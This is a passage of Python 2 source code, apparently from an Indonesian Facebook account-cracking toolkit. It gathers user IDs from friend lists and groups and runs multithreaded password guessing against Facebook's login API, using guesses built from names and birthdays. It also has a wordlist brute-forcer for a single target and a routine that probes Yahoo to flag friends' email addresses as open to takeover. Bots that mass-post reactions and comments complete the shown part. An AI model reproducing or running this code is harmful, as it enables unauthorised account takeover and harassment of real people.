jalan('\033[1;94m[✺] \033[1;96mGet all friend id \033[1;95m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet all id from friend \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('reset')
print logo
idg=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong input"
pilih_super()
print "\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print 42*"\033[1;97m═"
##### crack #####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
#Pass1
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass1+" =>"+z['name'])
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
#Pass2
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass2+" =>"+z['name'])
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
#Pass3
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass3+" =>"+z['name'])
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
#Pass4
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass4+" =>"+z['name'])
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
#Pass5
pass5 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass5+" =>"+z['name'])
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
#Pass6
pass6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass6+" =>"+z['name'])
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
#Pass7
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name']+'doraemon321'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass7+" =>"+z['name'])
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal OK/CP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;91m[+] \033[1;92mCP File saved \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
######################################################
##### BRUTE FORCE #####
def brute():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
try:
email = raw_input("\033[1;91m[+] \033[1;92mID\033[1;97m/\033[1;92mEmail\033[1;97m/\033[1;92mHp \033[1;97mTarget \033[1;91m:\033[1;97m ")
passw = raw_input("\033[1;91m[+] \033[1;92mWordlist \033[1;97mext(list.txt) \033[1;91m: \033[1;97m")
total = open(passw,"r")
total = total.readlines()
print 42*"\033[1;97m═"
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mTarget \033[1;91m:\033[1;97m "+email
print "\033[1;91m[+] \033[1;92mTotal\033[1;96m "+str(len(total))+" \033[1;92mPassword"
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
sandi = open(passw,"r")
for pw in sandi:
try:
pw = pw.replace("\n","")
sys.stdout.write("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m: \033[1;97m"+pw)
sys.stdout.flush()
data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(email)+"&locale=en_US&password="+(pw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open("Brute.txt", "w")
dapat.write(email+" | "+pw+"\n")
dapat.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
elif 'www.facebook.com' in mpsh["error_msg"]:
ceks = open("Brutecekpoint.txt", "w")
ceks.write(email+" | "+pw+"\n")
ceks.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
time.sleep(1)
except IOError:
print ("\033[1;91m[!] File not found")
tanyaw()
def tanyaw():
why = raw_input("\033[1;91m[?] \033[1;92mCreate wordlist ? \033[1;92m[y/n]\033[1;91m:\033[1;97m ")
if why =="":
print "\033[1;91m[!] Wrong"
tanyaw()
elif why =="y":
wordlist()
elif why =="Y":
wordlist()
elif why =="n":
menu_hack()
elif why =="N":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
tanyaw()
##### YAHOO CHECKER #####
#---------------------------------------------------#
def menu_yahoo():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m With list friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Clone from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Clone from member group"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Using file"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
yahoo_pilih()
#----pilih
def yahoo_pilih():
go = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if go =="":
print "\033[1;91m[!] Wrong"
yahoo_pilih()
elif go =="1":
yahoofriends()
elif go =="2":
yahoofromfriends()
elif go =="3":
yahoomember()
elif go =="4":
yahoolist()
elif go =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
yahoo_pilih()
##### LIST FRIEND #####
def yahoofriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mGetting email friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### CLONE FROM FRIEND #####
def yahoofromfriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/FriendMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FriendMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO MEMBER #####
def yahoomember():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from group \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO FILE #####
def yahoolist():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
files = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;91m[!] File not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;97m═"
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### MENU BOT #####
#----------------------------------------#
def menu_bot():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Bot Reactions Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Bot Reactions Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Bot Komen Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Bot Komen Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Mass delete Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Mass accept friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Mass delete friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
bot_pilih()
#////////////
def bot_pilih():
bots = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if bots =="":
print "\033[1;91m[!] Wrong input"
bot_pilih()
elif bots =="1":
menu_react()
elif bots =="2":
grup_react()
elif bots =="3":
bot_komen()
elif bots =="4":
grup_komen()
elif bots =="5":
deletepost()
elif bots =="6":
accept()
elif bots =="7":
unfriend()
elif bots =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
bot_pilih()
##### MENU REACT #####
def menu_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
react_pilih()
#//////////////
def react_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
react_pilih()
elif aksi =="1":
tipe = "LIKE"
react()
elif aksi =="2":
tipe = "LOVE"
react()
elif aksi =="3":
tipe = "WOW"
react()
elif aksi =="4":
tipe = "HAHA"
react()
elif aksi =="5":
tipe = "SAD"
react()
elif aksi =="6":
tipe = "ANGRY"
react()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
react_pilih()
#####NEXT
def react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Target \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
oh = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksi))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT REACT GRUP #####
def grup_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
reactg_pilih()
#//////////////
def reactg_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
reactg_pilih()
elif aksi =="1":
tipe = "LIKE"
reactg()
elif aksi =="2":
tipe = "LOVE"
reactg()
elif aksi =="3":
tipe = "WOW"
reactg()
elif aksi =="4":
tipe = "HAHA"
reactg()
elif aksi =="5":
tipe = "SAD"
reactg()
elif aksi =="6":
tipe = "ANGRY"
reactg()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
reactg_pilih()
#####NEXT
def reactg():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Group \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
grup_react()
try:
oh = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksigrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN #####
def bot_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Target \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
p = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komen))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN GRUP #####
def grup_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Group \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
